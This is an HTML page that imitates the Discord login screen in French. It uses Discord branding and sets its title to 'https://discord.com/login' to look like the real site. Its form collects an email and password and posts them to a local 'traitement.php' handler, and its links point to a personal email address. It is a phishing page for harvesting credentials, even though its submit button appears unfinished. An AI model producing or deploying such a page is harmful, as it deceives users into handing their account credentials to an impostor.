<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="discord.css" />
        <title>https://discord.com/login</title>
    </head>

    <body>

        <section class="menu">
        <h1>
        <img src="images/discord.PNG" class="imageflottante" alt="Discord" />  Discord
        </h1>
        
        <h3>Ha, te revoilà !</h3>    


        <form method="post" action="traitement.php">
             <p>Nous sommes si heureux de te revoir !</p>
             <div>
                <label for="email">E-MAIL OU NUMERO DE TELEPHONE</label><br/>
                <input type="email" name="email" id="email" placeholder="Entrez votre Email" size="30" maxlength="20" />
            </div>
            <div>
            <label for="pass">MOT DE PASSE *</label><br/>
            <input type="password" name="pass" id="pass" placeholder="Entrez votre mot de passe" size="30" maxlength="20"  /><br/>
            <a href="mailto:martintoua@gmail.com.com">Tu as oublié ton mot de passe ?</a></div><br/>
            </div>
            <button class="connexion-styled" type="button" > Connexion</button>
            <!-- <input type="submit" value="Connexion" color="blue" /> --> <br/>
            Besoin d'un compte ? <a href="mailto:martintoua@gmail.com.com">S'inscrire</a>
        </form>
        </section>
    </body>
</html>